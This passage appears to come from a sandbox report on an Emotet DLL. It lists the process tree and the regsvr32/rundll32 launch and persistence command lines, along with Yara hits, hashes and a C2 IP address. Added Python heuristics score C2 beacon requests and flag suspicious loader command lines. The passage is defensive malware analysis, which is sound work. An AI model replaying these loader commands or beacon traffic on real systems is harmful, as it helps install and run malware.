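Both decrypted sessions above have the same beacon shape: a GET to a random alphanumeric path, a Host header that is a bare IP rather than a name, exactly one Cookie whose value is a long base64 blob (the encrypted check-in), Cache-Control: no-cache, and no User-Agent header at all. The heuristic below is an added example and not part of the Joe Sandbox report; it scores a raw HTTP request head on those five indicators. The beacon sample is constructed from session 1's request line, cookie name and header order with a deterministic stand-in for the cookie value so the block runs offline, the benign request is likewise constructed, and the alert threshold of four indicators is an assumption.

```python
"""Heuristic for Emotet-style HTTP C2 beacons (added example, not Joe Sandbox code).

Indicators, each taken from the decrypted sessions above:
  random-alnum-path     GET to a bare random alphanumeric path
  raw-ip-host           Host header is an IPv4 address, not a hostname
  no-user-agent         no User-Agent header at all
  single-base64-cookie  exactly one cookie whose value is a long base64 blob
  no-cache-get          Cache-Control: no-cache on a GET
The alert threshold (4 of 5) is an assumption for this example.
"""
import base64
import binascii
import re

IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d{1,5})?$")
RANDOM_PATH = re.compile(r"^/[A-Za-z0-9]{8,}$")
B64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
THRESHOLD = 4


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, path, headers).

    Header names are lower-cased; a repeated header keeps its last value.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_long_base64(value, min_len=64):
    """True if value is at least min_len chars and decodes as base64."""
    if len(value) < min_len or not B64_CHARS.match(value):
        return False
    padded = value + "=" * (-len(value) % 4)   # Emotet cookies often omit padding
    try:
        base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def c2_indicators(raw):
    """Return the list of indicator names the request head matches, in fixed order."""
    method, path, headers = parse_request(raw)
    found = []
    if method == "GET" and RANDOM_PATH.match(path):
        found.append("random-alnum-path")
    if IPV4_HOST.match(headers.get("host", "")):
        found.append("raw-ip-host")
    if "user-agent" not in headers:
        found.append("no-user-agent")
    pairs = [p.strip() for p in headers.get("cookie", "").split(";") if p.strip()]
    if len(pairs) == 1 and "=" in pairs[0]:
        _name, _, cookie_value = pairs[0].partition("=")
        if is_long_base64(cookie_value.strip()):
            found.append("single-base64-cookie")
    if method == "GET" and headers.get("cache-control", "").lower() == "no-cache":
        found.append("no-cache-get")
    return found


def is_emotet_like(raw, threshold=THRESHOLD):
    return len(c2_indicators(raw)) >= threshold


# Constructed sample modeled on session 1 above: request line, cookie name and
# header order are copied from the page; the cookie value is a deterministic
# base64 stand-in (160 chars) so the block runs offline.
_BLOB = base64.b64encode(bytes(range(120))).decode()
BEACON = (
    "GET /TBwKHjQjVeCWIQFS HTTP/1.1\r\n"
    "Cookie: TzD=" + _BLOB + "\r\n"
    "Host: 46.55.222.11\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed benign request for contrast.
BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: session=abc123; theme=dark\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("beacon", BEACON), ("benign", BENIGN)):
        print(label, is_emotet_like(req), c2_indicators(req))
```

Each indicator on its own is weak (plenty of legitimate clients omit a User-Agent, and internal tooling talks to raw IPs), which is why the check reports the full indicator list rather than a single boolean: the combination, not any one header, is what separates the beacon from ordinary traffic, and the list lets an analyst see which part of the pattern a near-miss lacked.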



                                                                        Target ID:0
                                                                        Start time:00:19:36
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll"
                                                                        Imagebase:0xe90000
                                                                        File size:116736 bytes
                                                                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Target ID:1
                                                                        Start time:00:19:37
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
                                                                        Imagebase:0x1190000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Target ID:2
                                                                        Start time:00:19:37
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll
                                                                        Imagebase:0xa20000
                                                                        File size:20992 bytes
                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.250264890.0000000004DF1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.250264890.0000000004DF1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.250193606.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.250193606.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        Target ID:3
                                                                        Start time:00:19:37
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
                                                                        Imagebase:0x860000
                                                                        File size:61952 bytes
                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.246760873.0000000003530000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.246760873.0000000003530000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.246960941.0000000004F11000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.246960941.0000000004F11000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        Target ID:4
                                                                        Start time:00:19:37
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllRegisterServer
                                                                        Imagebase:0x860000
                                                                        File size:61952 bytes
                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.246952927.0000000002940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.246952927.0000000002940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        Target ID:5
                                                                        Start time:00:19:41
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllUnregisterServer
                                                                        Imagebase:0x860000
                                                                        File size:61952 bytes
                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Target ID:6
                                                                        Start time:00:19:41
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Arwhu\ttgk.pdy"
                                                                        Imagebase:0xa20000
                                                                        File size:20992 bytes
                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.761637752.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.761637752.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
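Target ID 6 is the launch that outlives the initial loader: the sample has been copied into a randomly named subdirectory of SysWOW64 under a random non-.dll extension (Arwhu\ttgk.pdy) and is started silently with regsvr32.exe /s. Both properties are visible in the command line alone, so a process-creation rule can key on them. The check below is an added example, not part of the sandbox report; the persistence, initial-loader and export command lines are copied from the process list above, the shell32.dll line is a constructed benign control, and the allow-list of expected System32 subdirectories is an assumption to be extended for a real environment.

```python
"""Command-line check for the Emotet persistence launch in Target ID 6 above
(added example, not part of the sandbox report).

Rule (assumed for this example): regsvr32.exe or rundll32.exe loading a module that
  non-dll-extension     does not carry a .dll/.ocx/.cpl/.ax extension, or
  subdir-of-system-dir  sits in an unexpected subdirectory of SysWOW64/System32
                        (the malware created "Arwhu"; KNOWN_SUBDIRS is a starting
                        allow-list, not a complete one).
"""
import ntpath
import re

LOADERS = {"regsvr32.exe", "rundll32.exe"}
NORMAL_MODULE_EXT = {".dll", ".ocx", ".cpl", ".ax"}
SYSTEM_DIRS = (r"c:\windows\syswow64", r"c:\windows\system32")
KNOWN_SUBDIRS = {"drivers", "wbem", "spool", "windowspowershell"}  # assumed allow-list
TOKEN = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in TOKEN.findall(cmdline)]


def module_from_cmdline(cmdline):
    """Return (loader, module path), or (loader, None) if this is not a DLL loader call."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None, None
    loader = ntpath.basename(tokens[0]).lower()
    if loader not in LOADERS:
        return loader, None
    for tok in tokens[1:]:
        if tok.startswith(("/", "-")):      # regsvr32 switches such as /s, /u, /n
            continue
        return loader, tok.split(",", 1)[0]  # rundll32 takes "path,ExportName"
    return loader, None


def persistence_indicators(cmdline):
    """Return the indicator names the command line matches, in fixed order."""
    loader, module = module_from_cmdline(cmdline)
    if module is None:
        return []
    found = []
    low = module.lower()
    if ntpath.splitext(low)[1] not in NORMAL_MODULE_EXT:
        found.append("non-dll-extension")
    parent = ntpath.dirname(low)
    for sysdir in SYSTEM_DIRS:
        if parent.startswith(sysdir + "\\"):          # module is below, not in, sysdir
            first = parent[len(sysdir) + 1:].split("\\")[0]
            if first not in KNOWN_SUBDIRS:
                found.append("subdir-of-system-dir")
            break
    return found


# Command lines from the process list above, plus one constructed benign control.
SAMPLES = {
    "persist": r'C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Arwhu\ttgk.pdy"',
    "initial": r"regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll",
    "export": r"rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllRegisterServer",
    "control": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",  # constructed
}


def scan(samples=SAMPLES):
    """Map each sample name to its indicator list."""
    return {name: persistence_indicators(cmd) for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, hits in scan().items():
        print(f"{name:8s} {'ALERT' if hits else 'ok   '} {hits}")
```

Only the Target ID 6 line fires; the sandbox's own loadll32/regsvr32/rundll32 launches of the submitted file from the Desktop are what a user double-clicking a dropped DLL looks like and are better caught by the Yara hits listed above than by this rule. Adding the parent process (regsvr32 spawned by regsvr32, as here) and a check that the module file was created seconds before it was loaded would tighten the rule further without touching the two indicators it already uses.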

                                                                        Target ID:10
                                                                        Start time:00:19:58
                                                                        Start date:20/07/2022
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff7338d0000
                                                                        File size:51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 11
Start time: 00:19:59
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 12
Start time: 00:19:59
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

Target ID: 13
Start time: 00:20:01
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

Target ID: 14
Start time: 00:20:01
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

Target ID: 15
Start time: 00:20:02
Start date: 20/07/2022
Path: C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\SgrmBroker.exe
Imagebase: 0x7ff6e61c0000
File size: 163336 bytes
MD5 hash: D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 16
Start time: 00:20:03
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

Target ID: 18
Start time: 00:20:03
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 19
Start time: 00:20:05
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 20
Start time: 00:20:13
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 21
Start time: 00:20:24
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 23
Start time: 00:20:36
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 27
Start time: 00:21:04
Start date: 20/07/2022
Path: C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase: 0x7ff678970000
File size: 455656 bytes
MD5 hash: A267555174BFA53844371226F482B86B
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

Target ID: 28
Start time: 00:21:04
Start date: 20/07/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff647620000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

Target ID: 34
Start time: 00:23:02
Start date: 20/07/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservice -s W32Time
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

No disassembly